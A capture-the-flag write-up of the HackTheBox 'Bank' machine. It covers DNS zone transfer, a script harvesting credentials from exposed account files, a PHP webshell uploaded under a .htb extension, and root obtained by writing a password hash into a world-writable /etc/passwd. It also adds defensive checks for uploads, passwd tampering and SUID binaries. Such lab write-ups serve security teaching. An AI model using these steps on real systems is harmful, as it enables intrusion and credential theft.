# HTB - Bank

![Bank](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qDMWy0dZ4taDSZ0z-%2F-M2qDUtzyGKLRLYHpE1N%2Fimage.png?alt=media\&token=f5d70c97-2a81-4717-8e9b-4a67e166d223)

## Getting Root

### Tools Used:

**`dig, dirsearch.py, python`**

## Nmap

```bash
# Nmap 7.80 scan initiated Thu Mar 19 18:56:57 2020 as: nmap -sC -sV -p 22,53,80 -oA Bank 10.10.10.29   
Nmap scan report for 10.10.10.29
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 19 18:57:12 2020 -- 1 IP address (1 host up) scanned in 15.09 seconds
```

## Enumeration

### DNS

The nameserver on port 53 allows zone transfers to anyone, so an AXFR for the zone `bank.htb` (the usual HTB `<box>.htb` naming) returns every record. That gives us the hostnames to try as virtual hosts during HTTP enumeration; the SOA contact `chris.bank.htb` is the mailbox `chris@bank.htb`, so `chris` is also a candidate username:

```bash
# Zone Transfer
dig axfr bank.htb @10.10.10.29
; <<>> DiG 9.11.16-2-Debian <<>> axfr bank.htb @10.10.10.29
;; global options: +cmd
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.10.10.29
ns.bank.htb.            604800  IN      A       10.10.10.29
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
;; Query time: 54 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Thu Mar 19 19:37:51 EDT 2020
;; XFR size: 6 records (messages 1, bytes 171)

```
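As an added example (not part of the original writeup), the Python below parses the dig AXFR output above into a hosts-file line for vhost enumeration and also extracts the SOA contact, whose RNAME field `chris.bank.htb` is the mailbox `chris@bank.htb` and therefore a likely local username. The zone text is embedded inline so the script runs offline; no network access is needed.

```python
import re

# The record lines from the AXFR output above, embedded so this runs offline.
AXFR_OUTPUT = """\
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.10.10.29
ns.bank.htb.            604800  IN      A       10.10.10.29
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
"""

# owner-name (trailing dot stripped), TTL, class, type, rdata
RECORD_RE = re.compile(r"^(\S+)\.\s+\d+\s+IN\s+(\S+)\s+(.*)$")


def parse_axfr(text):
    """Return (owner, rtype, rdata) tuples; dig's ';' comment lines are skipped."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue
        m = RECORD_RE.match(line)
        if m:
            records.append((m.group(1), m.group(2), m.group(3).strip()))
    return records


def vhost_candidates(records):
    """Every hostname that resolves to an address, directly or via a CNAME."""
    addresses = {o: r for o, t, r in records if t in ("A", "AAAA")}
    cnames = {o: r.rstrip(".") for o, t, r in records if t == "CNAME"}
    hosts = dict(addresses)
    for owner, target in cnames.items():
        if target in addresses:
            hosts[owner] = addresses[target]
    return hosts


def hosts_file_lines(hosts):
    """Group names by IP into /etc/hosts lines, names sorted for stable output."""
    by_ip = {}
    for name, ip in hosts.items():
        by_ip.setdefault(ip, []).append(name)
    return [f"{ip} {' '.join(sorted(names))}" for ip, names in sorted(by_ip.items())]


def soa_contact(records):
    """The SOA RNAME is a mailbox with the '@' encoded as the first dot."""
    for _, rtype, rdata in records:
        if rtype == "SOA":
            rname = rdata.split()[1].rstrip(".")
            return rname.replace(".", "@", 1)
    return None


if __name__ == "__main__":
    recs = parse_axfr(AXFR_OUTPUT)
    for line in hosts_file_lines(vhost_candidates(recs)):
        print(line)
    print("SOA contact:", soa_contact(recs))
```

Append the printed line to `/etc/hosts` and feed each name to the web scanner as a separate target; the SOA contact goes on the username list for later password guessing or SSH.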

### HTTP

```bash
# python3 dirsearch.py -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php  

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 220521

Error Log: /opt/dirsearch/logs/errors-20-03-19_20-31-36.log

Target: http://bank.htb

[20:31:36] Starting: 
[20:31:36] 302 -    7KB - /  ->  login.php
[20:31:37] 301 -  305B  - /uploads  ->  http://bank.htb/uploads/
[20:31:38] 301 -  304B  - /assets  ->  http://bank.htb/assets/
[20:31:50] 301 -  301B  - /inc  ->  http://bank.htb/inc/
[20:42:17] 403 -  288B  - /server-status
[20:53:57] 301 -  314B  - /balance-transfer  ->  http://bank.htb/balance-transfer/

Task Completed

```

#### Checking out /balance-transfer/

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qGxMH-kAgaNd3qNi5%2F-M2qHhOz6tLcGgKecyyp%2Fimage.png?alt=media\&token=ead4e06b-55de-4c49-87b4-28e3866c3015)

Each file holds one account record whose Email and Password fields are stored in encrypted form, for example:

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qGxMH-kAgaNd3qNi5%2F-M2qI0w4piEPQPFe5bLv%2Fimage.png?alt=media\&token=c9c4a358-2c7d-4b45-a107-95a6402e1f7d)

A small Python script pulls every `.acc` file from the directory listing and prints the credential fields of each one:

```python
#!/usr/bin/env python3
# Created By: squid22
# HTB Bank
#
# Fetch every *.acc file linked from /balance-transfer/ and print the
# Email / Password fields of each one.

import re
import requests

url = "http://bank.htb/balance-transfer/"

# Reuse one TCP connection for the ~1000 requests.
session = requests.Session()
data = session.get(url).text

# File names in the directory listing are hex digests with a .acc suffix.
files = re.findall(r'href="(\w+\.acc)"', data)

for name in files:
    stuff = session.get(url + name).text
    user = re.search(r'Email: (.*)', stuff)
    passwd = re.search(r'Password: (.*)', stuff)
    # Skip files that do not follow the report format instead of crashing
    # on .group() of a None match.
    if user is None or passwd is None:
        print(f"File Name: {name} (no credential fields found)")
        continue

    print(f"File Name: {name}")
    print(f"Username: {user.group(1).strip()}")
    print(f"Password: {passwd.group(1).strip()}")
    print("========================================")
```

Running the script shows that one file was never encrypted and holds plaintext credentials:\
**File Name**: **`68576f20e9732f1b2edc4df5b8533230.acc`**
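As an added example, not from the original writeup: the script above prints more than a thousand records, so the practical step is to triage them rather than read them. The Python below works offline on constructed sample file contents (only the `Email:` / `Password:` line format the script relies on is assumed; the real file contents are not reproduced) and flags an entry two ways: its Email field looks like a real address, or its field length differs from the crowd.

```python
import re
from collections import Counter

# Constructed sample contents for five .acc files. Three carry opaque
# encrypted values, one is plaintext, one does not follow the format at all.
SAMPLE_FILES = {
    "0a1b2c.acc": "Email: pMzK6KoXiORTrrpZAN1c\nPassword: X60vZenfC0bgwXWSmxl1\n",
    "3d4e5f.acc": "Email: Qa9tKpL2mNvX7wRsYbCd\nPassword: Hj4kLm8nPq2rSt6vWx0y\n",
    "6a7b8c.acc": "Email: alice@bank.htb\nPassword: Winter2020!\n",
    "9d0e1f.acc": "Email: Zx1cVb3nMk5lPo7iUy9t\nPassword: Ab2cDe4fGh6iJk8lMn0o\n",
    "c0ffee.acc": "this file does not follow the report format\n",
}

EMAIL_RE = re.compile(r"^Email:\s*(.*)$", re.MULTILINE)
PASSWORD_RE = re.compile(r"^Password:\s*(.*)$", re.MULTILINE)
# Assumption: encrypted values are opaque tokens, while a genuine address has
# a local part, exactly one '@' and a dotted domain.
ADDRESS_RE = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")


def extract_credentials(content):
    """(email, password) from one report, or None if either field is missing."""
    email = EMAIL_RE.search(content)
    password = PASSWORD_RE.search(content)
    if email is None or password is None:
        return None
    return email.group(1).strip(), password.group(1).strip()


def looks_like_email(value):
    return ADDRESS_RE.fullmatch(value) is not None


def find_plaintext(files):
    """Entries whose Email field is a real address, i.e. was never encrypted."""
    hits = []
    for name, content in sorted(files.items()):
        creds = extract_credentials(content)
        if creds is not None and looks_like_email(creds[0]):
            hits.append((name, creds[0], creds[1]))
    return hits


def length_outliers(files):
    """Files whose Email field length differs from the most common length.

    Catches a plaintext record even when it is not an address, because
    fixed-size cipher output looks nothing like free text."""
    lengths = {}
    for name, content in files.items():
        creds = extract_credentials(content)
        if creds is not None:
            lengths[name] = len(creds[0])
    if not lengths:
        return []
    common_length = Counter(lengths.values()).most_common(1)[0][0]
    return sorted(name for name, length in lengths.items() if length != common_length)


if __name__ == "__main__":
    for name, email, password in find_plaintext(SAMPLE_FILES):
        print(f"{name}: {email} / {password}")
    print("length outliers:", length_outliers(SAMPLE_FILES))
```

To use it against the live target, fill the dictionary from the downloaded `.acc` files (or have the fetch loop above collect `stuff` per file name) and run both checks; a file flagged by either is worth opening by hand.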

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qDmLbXVZLS4wcyRfH%2F-M2qFoKhDrJe5VdFyjU_%2Fimage.png?alt=media\&token=ff8616a0-0eea-4d06-8211-7026c0a37bb2)

Let's login to **`http://bank.htb/login.php`** using the credentials found.

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qGxMH-kAgaNd3qNi5%2F-M2qJ4ETmxsfUV7Zf38v%2Fimage.png?alt=media\&token=5cd6dab1-7088-466f-bd01-d0f19832e5a4)

Success!

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2psKOyWkJ4_7S3nSMO%2F-M2pvX1jApQPfknUdohH%2Fimage.png?alt=media\&token=2b0cf58a-0068-41c8-a629-69a9f9ade171)

## Getting shell

The **Support** page has a file-upload form that appears to accept only images. The page source, however, contains a debug comment stating that files with the **`.htb`** extension are executed as PHP. Renaming a PHP webshell to `.htb` therefore gets it past the upload check and still runs it server-side:

```bash
# mv webshell.php webshell.htb
```
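As an added example rather than code from the box or the writeup: the page does not show the upload filter's source or the Apache directive behind the debug comment, so the Python below assumes a filter that merely blocks the obvious PHP extensions and a constructed `AddType` fragment that maps `.htb` to PHP. It derives the executable extensions from the config and shows why `webshell.htb` passes the assumed weak check but not one that allowlists image extensions, rejects any extension component the server hands to a script engine, and verifies magic bytes.

```python
# Constructed Apache fragment. The writeup only quotes the debug comment; the
# AddType line mapping .htb to PHP is an assumption about what produces it.
SAMPLE_HTTPD_CONF = """\
AddType application/x-httpd-php .php .phtml
# [DEBUG] .htb is executed as php for debugging purposes only
AddType application/x-httpd-php .htb
AddHandler cgi-script .cgi
"""

# MIME types / handler names that make Apache run a file instead of serving it.
SCRIPT_HANDLERS = {"application/x-httpd-php", "php-script", "cgi-script"}

IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def executable_extensions(conf):
    """Extensions that AddType/AddHandler lines map to a script engine."""
    exts = set()
    for line in conf.splitlines():
        parts = line.strip().split()
        if len(parts) < 3 or parts[0].startswith("#"):
            continue
        if parts[0] in ("AddType", "AddHandler") and parts[1] in SCRIPT_HANDLERS:
            exts.update(p.lstrip(".").lower() for p in parts[2:])
    return exts


def name_extensions(filename):
    """All extension components: mod_mime looks at every one, not just the last."""
    return {part.lower() for part in filename.split(".")[1:]}


def naive_check(filename):
    """Assumed weak filter: only the obvious PHP extensions are blocked."""
    last = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return last not in {"php", "phtml", "php5"}


def hardened_check(filename, content, conf):
    """Allowlist image extensions, refuse double extensions and anything the
    server executes, and require the content to start with matching magic."""
    exts = name_extensions(filename)
    if len(exts) != 1:
        return False
    ext = next(iter(exts))
    if ext not in IMAGE_EXTENSIONS:
        return False
    if exts & executable_extensions(conf):
        return False          # catches a .htb-style debug mapping on an image type
    return content.startswith(IMAGE_MAGIC[ext])


if __name__ == "__main__":
    shell = b"<?php system($_GET['c']); ?>"
    print("executable:", sorted(executable_extensions(SAMPLE_HTTPD_CONF)))
    print("naive allows webshell.htb:", naive_check("webshell.htb"))
    print("hardened allows webshell.htb:", hardened_check("webshell.htb", shell, SAMPLE_HTTPD_CONF))
```

Even with the hardened check in place, uploads belong in a directory where no script handler applies (or outside the web root entirely), so that a later "temporary" handler mapping like the one above cannot turn the upload directory into a code-execution path.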

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qGxMH-kAgaNd3qNi5%2F-M2qKYmFjnrrVnV_NjBn%2Fimage.png?alt=media\&token=47d947f7-3cb7-45e3-9aa7-1aa9abe614ff)

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qGxMH-kAgaNd3qNi5%2F-M2qKj1fD3hrOuZpRTF1%2Fimage.png?alt=media\&token=f525279c-2aae-4d63-a1bb-76024ebe1c68)

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2psKOyWkJ4_7S3nSMO%2F-M2pvhXiU_C9F87mq-ki%2Fimage.png?alt=media\&token=be588d3f-e91f-40b9-b28e-24e2ff4c7f6b)

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qGxMH-kAgaNd3qNi5%2F-M2qM6URcBp1z37ieMUw%2Fimage.png?alt=media\&token=f9bf9039-b35d-452e-8d40-62b275b1e0af)

## Privilege Escalation

### Method 1 - /etc/passwd

During enumeration, `/etc/passwd` turned out to be world-writable (mode 0666), which means any local user, `www-data` included, can rewrite root's password field:

```bash
www-data@bank:/var/www/bank/uploads$ stat /etc/passwd
  File: '/etc/passwd'
  Size: 1349            Blocks: 8          IO Block: 4096   regular file
Device: 801h/2049d      Inode: 661044      Links: 1
Access: (0666/-rw-rw-rw-)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2020-03-20 06:03:09.092145868 +0200
Modify: 2020-03-20 06:03:05.884145943 +0200
Change: 2020-03-20 06:03:05.884145943 +0200
 Birth: -

```

Generate a password hash for the password **pass123** with openssl. `-1` selects MD5-crypt, which the system's `crypt()` still accepts, so the hash is usable in the password field:

```bash
# openssl passwd --help
Usage: passwd [options] [passwords]
where options are
-crypt             standard Unix password algorithm (default)
-1                 MD5-based password algorithm
-apr1              MD5-based password algorithm, Apache variant
-salt string       use provided salt
-in file           read passwords from file
-stdin             read passwords from stdin
-noverify          never verify when reading password from terminal
-quiet             no warnings
-table             format output as table
-reverse           switch table columns

```

```bash
# openssl passwd -1 pass123
$1$rptdxUK7$QM4amjM8hyLaeSmEIr.U31
```

Replace the `x` in root's entry of **`/etc/passwd`** with the generated hash. When that field holds a real hash instead of `x`, authentication uses it directly and never consults `/etc/shadow`:

```bash
# vim /etc/passwd
root:$1$rptdxUK7$QM4amjM8hyLaeSmEIr.U31:0:0:root:/root:/bin/bash
```

Switch to root with the new password:

```bash
www-data@bank:/run/shm$ su root
Password: 
root@bank:/run/shm# 
root@bank:/run/shm# id
uid=0(root) gid=0(root) groups=0(root)
root@bank:/run/shm# 
root@bank:/run/shm# 
root@bank:/run/shm# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:f4:a0  
          inet addr:10.10.10.29  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:f4a0/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:f4a0/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1532663 errors:33 dropped:156 overruns:0 frame:0
          TX packets:1522107 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:287906340 (287.9 MB)  TX bytes:713942880 (713.9 MB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:3393 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3393 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:348982 (348.9 KB)  TX bytes:348982 (348.9 KB)


```
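As an added example (not from the original writeup), here is the same tampering seen from the defender's side: a Python check that flags the world-writable mode shown in the `stat` output and scans `/etc/passwd` for entries whose password field holds a hash instead of `x`, or that grant uid 0 to a name other than root. The `/etc/passwd` excerpt is constructed around the root line written above; the other accounts are made up.

```python
import stat

# Constructed /etc/passwd excerpt: the root line is the one written in the
# procedure above, the remaining accounts are made up.
SAMPLE_PASSWD = """\
root:$1$rptdxUK7$QM4amjM8hyLaeSmEIr.U31:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
chris:x:1000:1000:chris,,,:/home/chris:/bin/bash
backdoor:x:0:0::/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

# crypt(3) prefixes, so a finding names the algorithm behind the hash.
HASH_PREFIXES = {
    "$1$": "md5crypt",
    "$2b$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}


def world_writable(mode):
    """True when the st_mode has the other-write bit, as 0666 above does."""
    return bool(mode & stat.S_IWOTH)


def hash_algorithm(field):
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    return "unknown or DES-crypt"


def suspicious_entries(text):
    """(line number, user, reason) for entries that should not exist on a
    shadow-enabled system."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((lineno, user, "empty password field"))
        elif pw not in ("x", "*", "!", "!!"):
            findings.append((lineno, user,
                             f"{hash_algorithm(pw)} hash in /etc/passwd, /etc/shadow bypassed"))
        if uid == "0" and user != "root":
            findings.append((lineno, user, "uid 0 account other than root"))
    return findings


if __name__ == "__main__":
    import os
    st = os.stat("/etc/passwd")
    print("/etc/passwd world-writable:", world_writable(st.st_mode))
    with open("/etc/passwd") as fh:
        for finding in suspicious_entries(fh.read()):
            print(finding)
```

Run it from a cron job or a configuration-management check; either finding is a strong indicator that the host has already been rooted this way, and the fix for the root cause is `chmod 644 /etc/passwd` plus a look at how the mode was changed in the first place.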

### Method 2 - SUID executable

Listing SUID binaries turns up one that no package would install, `/var/htb/bin/emergency`:

```bash
www-data@bank:/var/www/bank/uploads$ find / -perm -4000 -type f -ls 2>/dev/null
921605  112 -rwsr-xr-x   1 root     root       112204 Jun 14  2017 /var/htb/bin/emergency
397109    8 -rwsr-xr-x   1 root     root         5480 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
655904  484 -rwsr-xr-x   1 root     root       492972 Aug 11  2016 /usr/lib/openssh/ssh-keysign
395220  328 -rwsr-xr--   1 root     messagebus   333952 Dec  7  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper   
921007   12 -rwsr-xr-x   1 root     root         9808 Nov 24  2015 /usr/lib/policykit-1/polkit-agent-helper-1
403773   48 -rwsr-sr-x   1 daemon   daemon      46652 Oct 21  2013 /usr/bin/at
397102   36 -rwsr-xr-x   1 root     root        35916 May 17  2017 /usr/bin/chsh
397137   48 -rwsr-xr-x   1 root     root        45420 May 17  2017 /usr/bin/passwd
397136   44 -rwsr-xr-x   1 root     root        44620 May 17  2017 /usr/bin/chfn
404048   20 -rwsr-xr-x   1 root     root        18168 Nov 24  2015 /usr/bin/pkexec
397130   32 -rwsr-xr-x   1 root     root        30984 May 17  2017 /usr/bin/newgrp
403576   20 -rwsr-xr-x   1 root     root        18136 May  8  2014 /usr/bin/traceroute6.iputils
397103   68 -rwsr-xr-x   1 root     root        66284 May 17  2017 /usr/bin/gpasswd
393513  156 -rwsr-xr-x   1 root     root       156708 May 29  2017 /usr/bin/sudo
403601   72 -rwsr-xr-x   1 root     root        72860 Oct 21  2013 /usr/bin/mtr
397540   20 -rwsr-sr-x   1 libuuid  libuuid     17996 Nov 24  2016 /usr/sbin/uuidd
403655  316 -rwsr-xr--   1 root     dip        323000 Apr 21  2015 /usr/sbin/pppd
393288   40 -rwsr-xr-x   1 root     root        38932 May  8  2014 /bin/ping
393289   44 -rwsr-xr-x   1 root     root        43316 May  8  2014 /bin/ping6
397131   36 -rwsr-xr-x   1 root     root        35300 May 17  2017 /bin/su
403434   32 -rwsr-xr-x   1 root     root        30112 May 15  2015 /bin/fusermount
393504   88 -rwsr-xr-x   1 root     root        88752 Nov 24  2016 /bin/mount
396269   68 -rwsr-xr-x   1 root     root        67704 Nov 24  2016 /bin/umount

```
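As an added example (not from the writeup), a Python triage of the `find -ls` listing above: parse each line and report the SUID binaries that are not in a baseline of paths expected on the distribution, or that live somewhere a packaged setuid binary would not. The baseline here is assumed and partial (just the stock paths from this listing); in practice it is built from a clean image of the same release, never from the host under investigation.

```python
# The SUID listing from the find command above, verbatim.
SUID_LISTING = """\
921605  112 -rwsr-xr-x   1 root     root       112204 Jun 14  2017 /var/htb/bin/emergency
397109    8 -rwsr-xr-x   1 root     root         5480 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
655904  484 -rwsr-xr-x   1 root     root       492972 Aug 11  2016 /usr/lib/openssh/ssh-keysign
395220  328 -rwsr-xr--   1 root     messagebus   333952 Dec  7  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
921007   12 -rwsr-xr-x   1 root     root         9808 Nov 24  2015 /usr/lib/policykit-1/polkit-agent-helper-1
403773   48 -rwsr-sr-x   1 daemon   daemon      46652 Oct 21  2013 /usr/bin/at
397102   36 -rwsr-xr-x   1 root     root        35916 May 17  2017 /usr/bin/chsh
397137   48 -rwsr-xr-x   1 root     root        45420 May 17  2017 /usr/bin/passwd
397136   44 -rwsr-xr-x   1 root     root        44620 May 17  2017 /usr/bin/chfn
404048   20 -rwsr-xr-x   1 root     root        18168 Nov 24  2015 /usr/bin/pkexec
397130   32 -rwsr-xr-x   1 root     root        30984 May 17  2017 /usr/bin/newgrp
403576   20 -rwsr-xr-x   1 root     root        18136 May  8  2014 /usr/bin/traceroute6.iputils
397103   68 -rwsr-xr-x   1 root     root        66284 May 17  2017 /usr/bin/gpasswd
393513  156 -rwsr-xr-x   1 root     root       156708 May 29  2017 /usr/bin/sudo
403601   72 -rwsr-xr-x   1 root     root        72860 Oct 21  2013 /usr/bin/mtr
397540   20 -rwsr-sr-x   1 libuuid  libuuid     17996 Nov 24  2016 /usr/sbin/uuidd
403655  316 -rwsr-xr--   1 root     dip        323000 Apr 21  2015 /usr/sbin/pppd
393288   40 -rwsr-xr-x   1 root     root        38932 May  8  2014 /bin/ping
393289   44 -rwsr-xr-x   1 root     root        43316 May  8  2014 /bin/ping6
397131   36 -rwsr-xr-x   1 root     root        35300 May 17  2017 /bin/su
403434   32 -rwsr-xr-x   1 root     root        30112 May 15  2015 /bin/fusermount
393504   88 -rwsr-xr-x   1 root     root        88752 Nov 24  2016 /bin/mount
396269   68 -rwsr-xr-x   1 root     root        67704 Nov 24  2016 /bin/umount
"""

# Assumed, partial baseline of stock setuid paths for this Ubuntu release.
STOCK_SUID = {
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/bin/at", "/usr/bin/chsh",
    "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/pkexec", "/usr/bin/newgrp",
    "/usr/bin/traceroute6.iputils", "/usr/bin/gpasswd", "/usr/bin/sudo",
    "/usr/bin/mtr", "/usr/sbin/uuidd", "/usr/sbin/pppd", "/bin/ping",
    "/bin/ping6", "/bin/su", "/bin/fusermount", "/bin/mount", "/bin/umount",
}

# Directories where a packaged setuid binary has no business living.
UNUSUAL_ROOTS = ("/var/", "/opt/", "/home/", "/tmp/", "/dev/shm/", "/srv/")


def parse_find_ls(text):
    """Parse `find -ls` output: inode, blocks, perms, links, owner, group,
    size, three date fields, then the path (which may contain spaces)."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 11:
            continue
        entries.append({
            "perms": parts[2],
            "owner": parts[4],
            "group": parts[5],
            "size": int(parts[6]),
            "mtime": " ".join(parts[7:10]),
            "path": " ".join(parts[10:]),
        })
    return entries


def triage(entries, baseline=STOCK_SUID):
    """(path, owner, reasons) for binaries worth reversing first."""
    flagged = []
    for e in entries:
        reasons = []
        if e["path"] not in baseline:
            reasons.append("not in distro baseline")
        if e["path"].startswith(UNUSUAL_ROOTS):
            reasons.append("unusual location")
        if reasons:
            flagged.append((e["path"], e["owner"], ", ".join(reasons)))
    return flagged


if __name__ == "__main__":
    for path, owner, why in triage(parse_find_ls(SUID_LISTING)):
        print(f"{path} (owner {owner}): {why}")
```

Pipe a live `find / -perm -4000 -type f -ls 2>/dev/null` into the parser instead of the embedded listing; whatever is flagged gets `strings`, `ltrace` and a look at what it executes before you run it.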

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qAmPqYqlKpkrfzdQx%2F-M2qDKhZgHyAUMPvvmUp%2Fimage.png?alt=media\&token=00418c6d-c17a-4284-90f1-c8c1053fb318)
